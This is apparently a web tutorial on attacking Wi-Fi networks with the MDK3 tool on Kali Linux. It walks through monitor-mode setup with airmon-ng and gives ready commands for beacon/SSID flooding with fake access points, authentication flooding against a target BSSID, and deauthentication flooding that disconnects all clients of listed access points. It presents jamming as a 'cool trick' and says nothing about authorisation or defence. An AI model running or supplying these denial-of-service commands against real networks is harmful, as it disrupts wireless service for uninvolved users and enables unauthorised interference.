MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
MDK3 so called Murder Death Kill 3 is one of the most popular wireless hacking tool and specifically designed for WLAN Environments. The main operation of this tool is to flood the network with fake traffic against the network.
This version of MDK3 has a new feature that sends directed probe requests with invalid SSID characters to an AP. The hope is that if enough probes are sent, the AP will lock up and reboot.
As a prerequisite, make sure that your Kali Linux machine must have USB WiFi adapter, and to check type “iwconfig” in your terminal.
Now start your wireless adapter with the help of Airmon-ng Package and put it into Packet Injecting mode i.e. Monitor Mode by typing the following command in your terminal:
Command: airmon-ng start wlan0
Fake SSID (Random) Flooding with MDK3
SSID(Service Set Identifier) Flooding or Beacon Flooding can be easily done with the help of mdk3 tool. It means MDK3 can broadcast hundreds or even thousands of fake APs.
SSID Flooding is not a denial of service but still its a pretty cool trick to jam the network.
Command: mdk3 wlan0mon b -c 1
Here b option tells MDK3 to use beacon/SSID Flooding Mode
-c 1 tells MDK3 to broadcast all fake APs on channel 1.
You can also define the custom SSID from a file which you want to broadcast in your network.
Let’s create a text file named as yeahhub.list as shown below:
Now run the following command:
Command: mdk3 wlan0mon b -c 1 -f yeahhub.list
Here, -b defines for Beacon Flood Mode
-c 1 – On Channel 1
-f defines the filename
Now moving on actual DOS attack, you can perform DOS attack with MDK3 by two ways:
- Authentication Flooding
- Deauthentication Flooding
In Authentication Flooding, too many authentication requests at one time may cause the wireless access point to freeze up and perhaps stop working entirely.
Command: mdk3 wlan0mon a -a <BSSID>
Here, a defines the Authentication DOS Mode
-a defines the target MAC Address so called BSSID (Base Service Set Identifier)
In Deauthentication Flooding, it works much better than authentication mode and doesn’t require the resources that first one does.
Also Read: Wireless DOS Attack with Bash Script
To DOS with Deauthentication mode, you need to save all BSSID address in a file and then specify the file with -b option.
This will sent deauth packets to any and all clients connected to the AP specified in the file.
Command: mdk3 wlan0mon d -b blacklist
Here, d defines Deauthentictaion/Disassociation Amok Mode
-b defines the file name containing MAC Addresses to attack
For a full list of mdk3 options, type “mdk3 –fullhelp“.